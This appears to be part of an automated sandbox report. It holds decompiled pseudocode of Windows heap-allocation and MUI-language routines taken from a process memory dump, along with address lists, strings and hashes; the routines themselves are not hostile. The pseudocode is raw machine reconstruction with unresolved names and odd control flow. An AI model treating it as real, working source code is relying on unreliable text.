                                                                								_t542 = 0x7ffe0380;
                                                                								__eflags = _t286;
                                                                								if(_t286 != 0) {
                                                                									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                								} else {
                                                                									_t289 = 0x7ffe0380;
                                                                								}
                                                                								__eflags =  *_t289;
                                                                								if( *_t289 != 0) {
                                                                									_t290 =  *[fs:0x30];
                                                                									__eflags =  *(_t290 + 0x240) & 1;
                                                                									if(( *(_t290 + 0x240) & 1) != 0) {
                                                                										__eflags = E01647D50();
                                                                										if(__eflags != 0) {
                                                                											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                										}
                                                                										E016E1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                                									}
                                                                								}
                                                                								_t291 = E01647D50();
                                                                								_t543 = 0x7ffe038a;
                                                                								__eflags = _t291;
                                                                								if(_t291 != 0) {
                                                                									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                								} else {
                                                                									_t246 = 0x7ffe038a;
                                                                								}
                                                                								__eflags =  *_t246;
                                                                								if( *_t246 != 0) {
                                                                									__eflags = E01647D50();
                                                                									if(__eflags != 0) {
                                                                										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                										__eflags = _t543;
                                                                									}
                                                                									_push( *_t543 & 0x000000ff);
                                                                									_push(_t446);
                                                                									_push(_t446);
                                                                									L120:
                                                                									_push( *(_t553 + 0x74) << 3);
                                                                									_push(_v52);
                                                                									_t246 = E016E1411(_t446, _t553, _v44, __eflags);
                                                                								}
                                                                								goto L7;
                                                                							}
                                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                							_t339 = E0165174B( &_v44,  &_v52, 0x4000);
                                                                							__eflags = _t339;
                                                                							if(_t339 < 0) {
                                                                								L94:
                                                                								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                                								__eflags = _v40;
                                                                								if(_v40 == 0) {
                                                                									goto L153;
                                                                								}
                                                                								E0164B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                                								goto L152;
                                                                							}
                                                                							_t344 = E01647D50();
                                                                							__eflags = _t344;
                                                                							if(_t344 != 0) {
                                                                								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                							} else {
                                                                								_t347 = 0x7ffe0380;
                                                                							}
                                                                							__eflags =  *_t347;
                                                                							if( *_t347 != 0) {
                                                                								_t348 =  *[fs:0x30];
                                                                								__eflags =  *(_t348 + 0x240) & 1;
                                                                								if(( *(_t348 + 0x240) & 1) != 0) {
                                                                									E016E14FB(_t445, _t553, _v44, _v52, 6);
                                                                								}
                                                                							}
                                                                							_t513 = _v48;
                                                                							goto L33;
                                                                						}
                                                                						__eflags =  *_v12 - 3;
                                                                						_t513 = _v48;
                                                                						if( *_v12 == 3) {
                                                                							goto L27;
                                                                						}
                                                                						__eflags = _t460;
                                                                						if(_t460 == 0) {
                                                                							goto L9;
                                                                						}
                                                                						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                                						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                                							goto L9;
                                                                						}
                                                                						goto L27;
                                                                					}
                                                                				}
                                                                				_t445 = _a4;
                                                                				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                                					_t513 = __edx;
                                                                					goto L10;
                                                                				}
                                                                				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                                				_v20 = _t433;
                                                                				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                                					_t513 = _t539;
                                                                					goto L9;
                                                                				} else {
                                                                					_t437 = E016499BF(__ecx, __edx,  &_a4, 0);
                                                                					_t445 = _a4;
                                                                					_t514 = _t437;
                                                                					_v56 = _t514;
                                                                					if(_t445 - 0x201 > 0xfbff) {
                                                                						goto L14;
                                                                					} else {
                                                                						E0164A830(__ecx, _t514, _t445);
                                                                						_t506 =  *(_t553 + 0x238);
                                                                						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                                						_t246 = _t506 >> 4;
                                                                						if(_t551 < _t506 - _t246) {
                                                                							_t508 =  *(_t553 + 0x23c);
                                                                							_t246 = _t508 >> 2;
                                                                							__eflags = _t551 - _t508 - _t246;
                                                                							if(_t551 > _t508 - _t246) {
                                                                								_t246 = E0165ABD8(_t553);
                                                                								 *(_t553 + 0x23c) = _t551;
                                                                								 *(_t553 + 0x238) = _t551;
                                                                							}
                                                                						}
                                                                						goto L7;
                                                                					}
                                                                				}
                                                                			}

                                                                0x0164a46f
                                                                0x0164a471
                                                                0x0164a471
                                                                0x0164a471
                                                                0x0164a474
                                                                0x0164a479
                                                                0x0164a47d
                                                                0x0164a47f
                                                                0x01692229
                                                                0x0169222f
                                                                0x0164a3c8
                                                                0x0164a3c8
                                                                0x0164a3ca
                                                                0x0164a3ca
                                                                0x00000000
                                                                0x0164a3ca
                                                                0x01692235
                                                                0x0169223a
                                                                0x0169223a
                                                                0x00000000
                                                                0x00000000
                                                                0x01692240
                                                                0x01692246
                                                                0x0169224a
                                                                0x01692269
                                                                0x0169226e
                                                                0x0169224c
                                                                0x01692261
                                                                0x01692266
                                                                0x01692274
                                                                0x01692279
                                                                0x0169227e
                                                                0x01692286
                                                                0x01692288
                                                                0x0169228d
                                                                0x0169228d
                                                                0x01692292
                                                                0x01692292
                                                                0x01692295
                                                                0x01692295
                                                                0x00000000
                                                                0x01692295
                                                                0x0164a485
                                                                0x0164a489
                                                                0x0164a48b
                                                                0x0164a48f
                                                                0x0164a493
                                                                0x0164a497
                                                                0x0164a49b
                                                                0x0164a4bb
                                                                0x0164a4bb
                                                                0x0164a4bd
                                                                0x0164a4ff
                                                                0x0164a4ff
                                                                0x0164a501
                                                                0x0164a505
                                                                0x0164a50f
                                                                0x0164a517
                                                                0x0164a51b
                                                                0x0164a527
                                                                0x0164a52b
                                                                0x01692182
                                                                0x01692185
                                                                0x01692193
                                                                0x01692199
                                                                0x01692199
                                                                0x0164a531
                                                                0x0164a535
                                                                0x0164a538
                                                                0x0164a548
                                                                0x0164a54b
                                                                0x0164a54d
                                                                0x0164a553
                                                                0x0164a559
                                                                0x01692100
                                                                0x01692103
                                                                0x01692109
                                                                0x0169210f
                                                                0x01692112
                                                                0x01692131
                                                                0x01692136
                                                                0x01692114
                                                                0x01692129
                                                                0x0169212e
                                                                0x0169213c
                                                                0x01692141
                                                                0x01692147
                                                                0x0169214d
                                                                0x01692151
                                                                0x01692154
                                                                0x01692154
                                                                0x01692159
                                                                0x01692159
                                                                0x01692103
                                                                0x0164a55f
                                                                0x0164a562
                                                                0x0164a565
                                                                0x0164a567
                                                                0x01692162
                                                                0x0164a56d
                                                                0x0164a574
                                                                0x0164a575
                                                                0x0164a579
                                                                0x0164a57e
                                                                0x01692169
                                                                0x0169216a
                                                                0x01692170
                                                                0x01692175
                                                                0x01692179
                                                                0x01692179
                                                                0x0164a57e
                                                                0x0164a584
                                                                0x0164a58f
                                                                0x0164a58f
                                                                0x0164a52b
                                                                0x0164a5ad
                                                                0x0164a5bc
                                                                0x0164a5c1
                                                                0x0164a5c6
                                                                0x0164a5cb
                                                                0x0164a5cd
                                                                0x016921a9
                                                                0x0164a5d3
                                                                0x0164a5d3
                                                                0x0164a5d3
                                                                0x0164a5d5
                                                                0x0164a5d8
                                                                0x016921b3
                                                                0x016921bc
                                                                0x016921c2
                                                                0x016921cd
                                                                0x016921cf
                                                                0x016921da
                                                                0x016921da
                                                                0x016921da
                                                                0x016921f7
                                                                0x016921f7
                                                                0x016921c2
                                                                0x0164a5de
                                                                0x0164a5e3
                                                                0x0164a5e8
                                                                0x0164a5ea
                                                                0x0169220a
                                                                0x0164a5f0
                                                                0x0164a5f0
                                                                0x0164a5f0
                                                                0x0164a5f2
                                                                0x0164a5f5
                                                                0x01692219
                                                                0x0169221b
                                                                0x0169208c
                                                                0x0169208c
                                                                0x0169208c
                                                                0x01692095
                                                                0x01692096
                                                                0x01692097
                                                                0x01692098
                                                                0x016920a4
                                                                0x016920a5
                                                                0x016920a9
                                                                0x016920a9
                                                                0x00000000
                                                                0x0164a5f5
                                                                0x0164a4bf
                                                                0x0164a4d3
                                                                0x0164a4d8
                                                                0x0164a4da
                                                                0x01691ede
                                                                0x01691ede
                                                                0x01691ee4
                                                                0x01691ee9
                                                                0x00000000
                                                                0x00000000
                                                                0x01691f07
                                                                0x00000000
                                                                0x01691f07
                                                                0x0164a4e0
                                                                0x0164a4e5
                                                                0x0164a4e7
                                                                0x016920cb
                                                                0x0164a4ed
                                                                0x0164a4ed
                                                                0x0164a4ed
                                                                0x0164a4f2
                                                                0x0164a4f5
                                                                0x016920d5
                                                                0x016920de
                                                                0x016920e4
                                                                0x016920f6
                                                                0x016920f6
                                                                0x016920e4
                                                                0x0164a4fb
                                                                0x00000000
                                                                0x0164a4fb
                                                                0x0164a4a1
                                                                0x0164a4a4
                                                                0x0164a4a8
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4aa
                                                                0x0164a4ac
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4b2
                                                                0x0164a4b5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0164a4b5
                                                                0x0164a43a
                                                                0x0164a340
                                                                0x0164a346
                                                                0x0164a600
                                                                0x00000000
                                                                0x0164a600
                                                                0x0164a34f
                                                                0x0164a351
                                                                0x0164a358
                                                                0x0164a3c6
                                                                0x00000000
                                                                0x0164a371
                                                                0x0164a37a
                                                                0x0164a37f
                                                                0x0164a382
                                                                0x0164a384
                                                                0x0164a394
                                                                0x00000000
                                                                0x0164a396
                                                                0x0164a399
                                                                0x0164a3a7
                                                                0x0164a3b0
                                                                0x0164a3b4
                                                                0x0164a3bb
                                                                0x0164a3d2
                                                                0x0164a3da
                                                                0x0164a3df
                                                                0x0164a3e1
                                                                0x0164a3e5
                                                                0x0164a3ea
                                                                0x0164a3f0
                                                                0x0164a3f0
                                                                0x0164a3e1
                                                                0x00000000
                                                                0x0164a3bb
                                                                0x0164a394

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-523794902
                                                                • Opcode ID: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                                                                • Instruction ID: a58218d68883bb604f2bbf9ab8a1bdff1839293b13ab0011d1eb6539b736bb00
                                                                • Opcode Fuzzy Hash: 6f555d18efe0a183ac37ce3301aa3c25c08c97ed996920cb854049b613eb3950
                                                                • Instruction Fuzzy Hash: 74421031244742AFDB15CF68CC94B2ABBEAFF84214F14896DE586CB352D734D981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 64%
                                                                			E016E2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                				signed int _t83;
                                                                				signed char _t89;
                                                                				intOrPtr _t90;
                                                                				signed char _t101;
                                                                				signed int _t102;
                                                                				intOrPtr _t104;
                                                                				signed int _t105;
                                                                				signed int _t106;
                                                                				intOrPtr _t108;
                                                                				intOrPtr _t112;
                                                                				short* _t130;
                                                                				short _t131;
                                                                				signed int _t148;
                                                                				intOrPtr _t149;
                                                                				signed int* _t154;
                                                                				short* _t165;
                                                                				signed int _t171;
                                                                				void* _t182;
                                                                
                                                                				_push(0x44);
                                                                				_push(0x1700e80);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				_t177 = __edx;
                                                                				_t181 = __ecx;
                                                                				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                                				 *((char*)(_t182 - 0x1d)) = 0;
                                                                				 *(_t182 - 0x24) = 0;
                                                                				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                                					_t83 = E016240E1("RtlAllocateHeap");
                                                                					__eflags = _t83;
                                                                					if(_t83 == 0) {
                                                                						L48:
                                                                						 *(_t182 - 0x24) = 0;
                                                                						L49:
                                                                						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                                						E016E30C4();
                                                                						goto L50;
                                                                					}
                                                                					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                                					 *(_t182 - 0x28) = _t89;
                                                                					 *(_t182 - 0x3c) = _t89;
                                                                					_t177 =  *(_t182 + 8);
                                                                					__eflags = _t177;
                                                                					if(_t177 == 0) {
                                                                						_t171 = 1;
                                                                						__eflags = 1;
                                                                					} else {
                                                                						_t171 = _t177;
                                                                					}
                                                                					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                                					__eflags = _t148 - 0x10;
                                                                					if(_t148 < 0x10) {
                                                                						_t148 = 0x10;
                                                                					}
                                                                					_t149 = _t148 + 8;
                                                                					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                                					__eflags = _t149 - _t177;
                                                                					if(_t149 < _t177) {
                                                                						L44:
                                                                						_t90 =  *[fs:0x30];
                                                                						__eflags =  *(_t90 + 0xc);
                                                                						if( *(_t90 + 0xc) == 0) {
                                                                							_push("HEAP: ");
                                                                							E0162B150();
                                                                						} else {
                                                                							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                						}
                                                                						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                                						E0162B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                                						goto L48;
                                                                					} else {
                                                                						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                                						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                                							goto L44;
                                                                						}
                                                                						__eflags = _t89 & 0x00000001;
                                                                						if((_t89 & 0x00000001) != 0) {
                                                                							_t178 =  *(_t182 - 0x28);
                                                                						} else {
                                                                							E0163EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                                							 *((char*)(_t182 - 0x1d)) = 1;
                                                                							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                                							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                                						}
                                                                						E016E4496(_t181, 0);
                                                                						_t177 = L01644620(_t181, _t181, _t178,  *(_t182 + 8));
                                                                						 *(_t182 - 0x24) = _t177;
                                                                						_t173 = 1;
                                                                						E016E49A4(_t181);
                                                                						__eflags = _t177;
                                                                						if(_t177 == 0) {
                                                                							goto L49;
                                                                						} else {
                                                                							_t177 = _t177 + 0xfffffff8;
                                                                							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                                							if( *((char*)(_t177 + 7)) == 5) {
                                                                								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                                								__eflags = _t177;
                                                                							}
                                                                							_t154 = _t177;
                                                                							 *(_t182 - 0x40) = _t177;
                                                                							__eflags =  *(_t181 + 0x4c);
                                                                							if( *(_t181 + 0x4c) != 0) {
                                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                                								if(__eflags != 0) {
                                                                									_push(_t154);
                                                                									_t173 = _t177;
                                                                									E016DFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                                								}
                                                                							}
                                                                							__eflags =  *(_t177 + 2) & 0x00000002;
                                                                							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                                								_t101 =  *(_t177 + 3);
                                                                								 *(_t182 - 0x29) = _t101;
                                                                								_t102 = _t101 & 0x000000ff;
                                                                							} else {
                                                                								_t130 = E01621F5B(_t177);
                                                                								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                                								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                                								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                                									 *_t130 = 0;
                                                                								} else {
                                                                									_t131 = E016516C7(1, _t173);
                                                                									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                                									 *_t165 = _t131;
                                                                									_t130 = _t165;
                                                                								}
                                                                								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                                							}
                                                                							 *(_t182 - 0x34) = _t102;
                                                                							 *(_t182 - 0x28) = _t102;
                                                                							__eflags =  *(_t181 + 0x4c);
                                                                							if( *(_t181 + 0x4c) != 0) {
                                                                								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                								__eflags =  *_t177;
                                                                							}
                                                                							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                                							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                                								__eflags = 0;
                                                                								E016E4496(_t181, 0);
                                                                							}
                                                                							__eflags =  *(_t182 - 0x24) -  *0x1716360; // 0x0
                                                                							_t104 =  *[fs:0x30];
                                                                							if(__eflags != 0) {
                                                                								_t105 =  *(_t104 + 0x68);
                                                                								 *(_t182 - 0x4c) = _t105;
                                                                								__eflags = _t105 & 0x00000800;
                                                                								if((_t105 & 0x00000800) == 0) {
                                                                									goto L49;
                                                                								}
                                                                								_t106 =  *(_t182 - 0x34);
                                                                								__eflags = _t106;
                                                                								if(_t106 == 0) {
                                                                									goto L49;
                                                                								}
                                                                								__eflags = _t106 -  *0x1716364; // 0x0
                                                                								if(__eflags != 0) {
                                                                									goto L49;
                                                                								}
                                                                								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1716366; // 0x0
                                                                								if(__eflags != 0) {
                                                                									goto L49;
                                                                								}
                                                                								_t108 =  *[fs:0x30];
                                                                								__eflags =  *(_t108 + 0xc);
                                                                								if( *(_t108 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push(E016CD455(_t181,  *(_t182 - 0x28)));
                                                                								_push( *(_t182 + 8));
                                                                								E0162B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                                								goto L34;
                                                                							} else {
                                                                								__eflags =  *(_t104 + 0xc);
                                                                								if( *(_t104 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push( *(_t182 + 8));
                                                                								E0162B150("Just allocated block at %p for %Ix bytes\n",  *0x1716360);
                                                                								L34:
                                                                								_t112 =  *[fs:0x30];
                                                                								__eflags =  *((char*)(_t112 + 2));
                                                                								if( *((char*)(_t112 + 2)) != 0) {
                                                                									 *0x1716378 = 1;
                                                                									 *0x17160c0 = 0;
                                                                									asm("int3");
                                                                									 *0x1716378 = 0;
                                                                								}
                                                                								goto L49;
                                                                							}
                                                                						}
                                                                					}
                                                                				} else {
                                                                					_t181 =  *0x1715708; // 0x0
                                                                					 *0x171b1e0(__ecx, __edx,  *(_t182 + 8));
                                                                					 *_t181();
                                                                					L50:
                                                                					return E0167D130(0, _t177, _t181);
                                                                				}
                                                                			}






















                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                • API String ID: 0-1745908468
                                                                • Opcode ID: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                                                                • Instruction ID: 5e4a8988300ccab08feed0086c2caef76e05b8b24dd72e6c60a84f629369f680
                                                                • Opcode Fuzzy Hash: 8b5542c3e36e2f6cf28d481346079a72588a7f2152a66c4f39843187869ea29d
                                                                • Instruction Fuzzy Hash: 5E911F31602641DFDB26DFA8CC58AADBFF2FF49610F18815CE5465B391C7329882CB08
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 96%
                                                                			E01633D34(signed int* __ecx) {
                                                                				signed int* _v8;
                                                                				char _v12;
                                                                				signed int* _v16;
                                                                				signed int* _v20;
                                                                				char _v24;
                                                                				signed int _v28;
                                                                				signed int _v32;
                                                                				char _v36;
                                                                				signed int _v40;
                                                                				signed int _v44;
                                                                				signed int* _v48;
                                                                				signed int* _v52;
                                                                				signed int _v56;
                                                                				signed int _v60;
                                                                				char _v68;
                                                                				signed int _t140;
                                                                				signed int _t161;
                                                                				signed int* _t236;
                                                                				signed int* _t242;
                                                                				signed int* _t243;
                                                                				signed int* _t244;
                                                                				signed int* _t245;
                                                                				signed int _t255;
                                                                				void* _t257;
                                                                				signed int _t260;
                                                                				void* _t262;
                                                                				signed int _t264;
                                                                				void* _t267;
                                                                				signed int _t275;
                                                                				signed int* _t276;
                                                                				short* _t277;
                                                                				signed int* _t278;
                                                                				signed int* _t279;
                                                                				signed int* _t280;
                                                                				short* _t281;
                                                                				signed int* _t282;
                                                                				short* _t283;
                                                                				signed int* _t284;
                                                                				void* _t285;
                                                                
                                                                				_v60 = _v60 | 0xffffffff;
                                                                				_t280 = 0;
                                                                				_t242 = __ecx;
                                                                				_v52 = __ecx;
                                                                				_v8 = 0;
                                                                				_v20 = 0;
                                                                				_v40 = 0;
                                                                				_v28 = 0;
                                                                				_v32 = 0;
                                                                				_v44 = 0;
                                                                				_v56 = 0;
                                                                				_t275 = 0;
                                                                				_v16 = 0;
                                                                				if(__ecx == 0) {
                                                                					_t280 = 0xc000000d;
                                                                					_t140 = 0;
                                                                					L50:
                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                					_t242[0x13] = _t140;
                                                                					_t242[0x16] = _v40;
                                                                					_t242[0x18] = _v28;
                                                                					_t242[0x14] = _v32;
                                                                					_t242[0x17] = _t275;
                                                                					_t242[0x15] = _v44;
                                                                					_t242[0x11] = _v56;
                                                                					_t242[0x12] = _v60;
                                                                					return _t280;
                                                                				}
                                                                				if(E01631B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                					_v56 = 1;
                                                                					if(_v8 != 0) {
                                                                						L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                					}
                                                                					_v8 = _t280;
                                                                				}
                                                                				if(E01631B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                					_v60 =  *_v8;
                                                                					L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                					_v8 = _t280;
                                                                				}
                                                                				if(E01631B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                					L16:
                                                                					if(E01631B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                						L28:
                                                                						if(E01631B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                							L46:
                                                                							_t275 = _v16;
                                                                							L47:
                                                                							_t161 = 0;
                                                                							L48:
                                                                							if(_v8 != 0) {
                                                                								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                							}
                                                                							_t140 = _v20;
                                                                							if(_t140 != 0) {
                                                                								if(_t275 != 0) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                									_t275 = 0;
                                                                									_v28 = 0;
                                                                									_t140 = _v20;
                                                                								}
                                                                							}
                                                                							goto L50;
                                                                						}
                                                                						_t167 = _v12;
                                                                						_t255 = _v12 + 4;
                                                                						_v44 = _t255;
                                                                						if(_t255 == 0) {
                                                                							_t276 = _t280;
                                                                							_v32 = _t280;
                                                                						} else {
                                                                							_t276 = L01644620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                							_t167 = _v12;
                                                                							_v32 = _t276;
                                                                						}
                                                                						if(_t276 == 0) {
                                                                							_v44 = _t280;
                                                                							_t280 = 0xc0000017;
                                                                							goto L46;
                                                                						} else {
                                                                							E0166F3E0(_t276, _v8, _t167);
                                                                							_v48 = _t276;
                                                                							_t277 = E01671370(_t276, 0x1604e90);
                                                                							_pop(_t257);
                                                                							if(_t277 == 0) {
                                                                								L38:
                                                                								_t170 = _v48;
                                                                								if( *_v48 != 0) {
                                                                									E0166BB40(0,  &_v68, _t170);
                                                                									if(L016343C0( &_v68,  &_v24) != 0) {
                                                                										_t280 =  &(_t280[0]);
                                                                									}
                                                                								}
                                                                								if(_t280 == 0) {
                                                                									_t280 = 0;
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                									_v44 = 0;
                                                                									_v32 = 0;
                                                                								} else {
                                                                									_t280 = 0;
                                                                								}
                                                                								_t174 = _v8;
                                                                								if(_v8 != 0) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                								}
                                                                								_v8 = _t280;
                                                                								goto L46;
                                                                							}
                                                                							_t243 = _v48;
                                                                							do {
                                                                								 *_t277 = 0;
                                                                								_t278 = _t277 + 2;
                                                                								E0166BB40(_t257,  &_v68, _t243);
                                                                								if(L016343C0( &_v68,  &_v24) != 0) {
                                                                									_t280 =  &(_t280[0]);
                                                                								}
                                                                								_t243 = _t278;
                                                                								_t277 = E01671370(_t278, 0x1604e90);
                                                                								_pop(_t257);
                                                                							} while (_t277 != 0);
                                                                							_v48 = _t243;
                                                                							_t242 = _v52;
                                                                							goto L38;
                                                                						}
                                                                					}
                                                                					_t191 = _v12;
                                                                					_t260 = _v12 + 4;
                                                                					_v28 = _t260;
                                                                					if(_t260 == 0) {
                                                                						_t275 = _t280;
                                                                						_v16 = _t280;
                                                                					} else {
                                                                						_t275 = L01644620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                						_t191 = _v12;
                                                                						_v16 = _t275;
                                                                					}
                                                                					if(_t275 == 0) {
                                                                						_v28 = _t280;
                                                                						_t280 = 0xc0000017;
                                                                						goto L47;
                                                                					} else {
                                                                						E0166F3E0(_t275, _v8, _t191);
                                                                						_t285 = _t285 + 0xc;
                                                                						_v48 = _t275;
                                                                						_t279 = _t280;
                                                                						_t281 = E01671370(_v16, 0x1604e90);
                                                                						_pop(_t262);
                                                                						if(_t281 != 0) {
                                                                							_t244 = _v48;
                                                                							do {
                                                                								 *_t281 = 0;
                                                                								_t282 = _t281 + 2;
                                                                								E0166BB40(_t262,  &_v68, _t244);
                                                                								if(L016343C0( &_v68,  &_v24) != 0) {
                                                                									_t279 =  &(_t279[0]);
                                                                								}
                                                                								_t244 = _t282;
                                                                								_t281 = E01671370(_t282, 0x1604e90);
                                                                								_pop(_t262);
                                                                							} while (_t281 != 0);
                                                                							_v48 = _t244;
                                                                							_t242 = _v52;
                                                                						}
                                                                						_t201 = _v48;
                                                                						_t280 = 0;
                                                                						if( *_v48 != 0) {
                                                                							E0166BB40(_t262,  &_v68, _t201);
                                                                							if(L016343C0( &_v68,  &_v24) != 0) {
                                                                								_t279 =  &(_t279[0]);
                                                                							}
                                                                						}
                                                                						if(_t279 == 0) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                							_v28 = _t280;
                                                                							_v16 = _t280;
                                                                						}
                                                                						_t202 = _v8;
                                                                						if(_v8 != 0) {
                                                                							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                						}
                                                                						_v8 = _t280;
                                                                						goto L28;
                                                                					}
                                                                				}
                                                                				_t214 = _v12;
                                                                				_t264 = _v12 + 4;
                                                                				_v40 = _t264;
                                                                				if(_t264 == 0) {
                                                                					_v20 = _t280;
                                                                				} else {
                                                                					_t236 = L01644620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                					_t280 = _t236;
                                                                					_v20 = _t236;
                                                                					_t214 = _v12;
                                                                				}
                                                                				if(_t280 == 0) {
                                                                					_t161 = 0;
                                                                					_t280 = 0xc0000017;
                                                                					_v40 = 0;
                                                                					goto L48;
                                                                				} else {
                                                                					E0166F3E0(_t280, _v8, _t214);
                                                                					_t285 = _t285 + 0xc;
                                                                					_v48 = _t280;
